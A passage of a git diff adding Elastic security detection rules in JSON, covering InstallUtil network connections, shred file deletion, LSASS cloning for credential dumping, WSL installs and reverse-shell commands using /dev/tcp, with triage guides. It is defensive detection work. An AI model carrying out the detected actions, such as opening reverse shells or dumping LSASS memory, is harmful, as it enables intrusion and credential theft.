"Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "a0ddb77b-0318-41f0-91e4-8c1b5528834f_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json new file mode 100644 index 00000000000..9954b8dc12c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies InstallUtil.exe making outbound network connections. This may indicate adversarial activity as InstallUtil is often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "InstallUtil Process Making Network Connections", + "query": "/* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */\n\nsequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"installutil.exe\"]\n [network where host.os.type == \"windows\" and process.name : \"installutil.exe\" and network.direction : (\"outgoing\", \"egress\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a13167f1-eec2-4015-9631-1fee60406dcf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.004", + "name": "InstallUtil", + "reference": "https://attack.mitre.org/techniques/T1218/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "a13167f1-eec2-4015-9631-1fee60406dcf_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json new file mode 100644 index 00000000000..a4bc712f7ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Deletion via Shred", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"shred\" and process.args in (\n \"-u\", \"--remove\", \"-z\", \"--zero\"\n) and not process.parent.name == \"logrotate\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a1329140-8de3-4445-9f87-908fb6d824f4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json new file mode 100644 index 00000000000..f9636cb757c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Deletion via Shred", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"shred\" and process.args in (\n \"-u\", \"--remove\", \"-z\", \"--zero\"\n) and not process.parent.name == \"logrotate\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a1329140-8de3-4445-9f87-908fb6d824f4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json new file mode 100644 index 00000000000..48a3c113d79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of an LSASS process clone via PssCaptureSnapShot where the parent process is the initial LSASS process instance. This may indicate an attempt to evade detection and dump LSASS memory for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential LSASS Clone Creation via PssCaptureSnapShot", + "query": "process where host.os.type == \"windows\" and event.code:\"4688\" and\n process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n process.parent.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\"\n", + "references": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://medium.com/@Achilles8284/the-birth-of-a-process-part-2-97c6fb9c42a2" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00", + "setup": "## Setup\n\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "a16612dd-b30e-4d41-86a0-ebe70974ec00_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json new file mode 100644 index 00000000000..3879cc54c22 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_6.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json new file mode 100644 index 00000000000..235e4151f8e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_7.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects changes to the registry that indicates the install of a new Windows Subsystem for Linux distribution by name. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Subsystem for Linux Distribution Installed", + "note": "## Triage and analysis\n\n### Investigating Windows Subsystem for Linux Distribution Installed\n\nThe Windows Subsystem for Linux (WSL) lets developers install a Linux distribution (such as Ubuntu, OpenSUSE, Kali, Debian, Arch Linux, etc) and use Linux applications, utilities, and Bash command-line tools directly on Windows, unmodified, without the overhead of a traditional virtual machine or dualboot setup. Attackers may abuse WSL to avoid security protections on a Windows host and perform a wide range of attacks.\n\nThis rule identifies the installation of a new Windows Subsystem for Linux distribution via registry events.\n\n### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine which distribution was installed. Some distributions such as Kali Linux can facilitate the compromise of the environment.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate that the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and the WSL distribution is homologated and approved in the environment.\n\n### Related Rules\n\n- Host Files System Changes via Windows Subsystem for Linux - e88d1fe9-b2f4-48d4-bace-a026dc745d4b\n- Execution via Windows Subsystem for Linux - db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd\n- Suspicious Execution via Windows Subsystem for Linux - 3e0eeb75-16e8-4f2f-9826-62461ca128b7\n- Windows Subsystem for Linux Enabled via Dism Utility - e2e0537d-7d8f-4910-a11d-559bcf61295a\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.path : \n (\"HK*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\",\n \"\\\\REGISTRY\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Lxss\\\\*\\\\PackageFamilyName\")\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a1699af0-8e1e-4ed0-8ec1-89783538a061", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "a1699af0-8e1e-4ed0-8ec1-89783538a061_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json b/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json new file mode 100644 index 00000000000..13efd71f65e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a198fbbd-9413-45ec-a269-47ae4ccf59ce_3.json @@ -0,0 +1,53 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule helps you test and practice using alerts with Elastic Security as you get set up. It\u2019s not a sign of threat activity.", + "enabled": false, + "false_positives": [ + "This rule is not looking for threat activity. Disable the rule if you're already familiar with alerts." + ], + "from": "now-30m", + "index": [ + "auditbeat-*", + "filebeat-*", + "logs-*", + "winlogbeat-*" + ], + "interval": "24h", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 1, + "name": "My First Rule", + "note": "This is a test alert.\n\nThis alert does not show threat activity. Elastic created this alert to help you understand how alerts work.\n\nFor normal rules, the Investigation Guide will help analysts investigate alerts.\n\nThis alert will show once every 24 hours for each host. It is safe to disable this rule.\n", + "query": "event.kind:event\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-rules.html" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a198fbbd-9413-45ec-a269-47ae4ccf59ce", + "severity": "low", + "tags": [ + "Use Case: Guided Onboarding" + ], + "threshold": { + "field": [ + "host.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 3 + }, + "id": "a198fbbd-9413-45ec-a269-47ae4ccf59ce_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json new file mode 100644 index 00000000000..f397cb8f6a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell Activity via Terminal", + "note": "## Triage and analysis\n\n### Investigating Potential Reverse Shell Activity via Terminal\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing.\n\nThis rule identifies commands that are potentially related to reverse shell activities using shell applications.\n\n#### Possible investigation steps\n\n- Examine the command line and extract the target domain or IP address information.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args : (\"*/dev/tcp/*\", \"*/dev/udp/*\", \"*zsh/net/tcp*\", \"*zsh/net/udp*\") and\n\n /* noisy FPs */\n not (process.parent.name : \"timeout\" and process.executable : \"/var/lib/docker/overlay*\") and\n not process.command_line : (\n \"*/dev/tcp/sirh_db/*\", \"*/dev/tcp/remoteiot.com/*\", \"*dev/tcp/elk.stag.one/*\", \"*dev/tcp/kafka/*\",\n \"*/dev/tcp/$0/$1*\", \"*/dev/tcp/127.*\", \"*/dev/udp/127.*\", \"*/dev/tcp/localhost/*\", \"*/dev/tcp/itom-vault/*\") and\n not process.parent.command_line : \"runc init\"\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + "https://github.com/WangYihang/Reverse-Shell-Manager", + "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856_108", 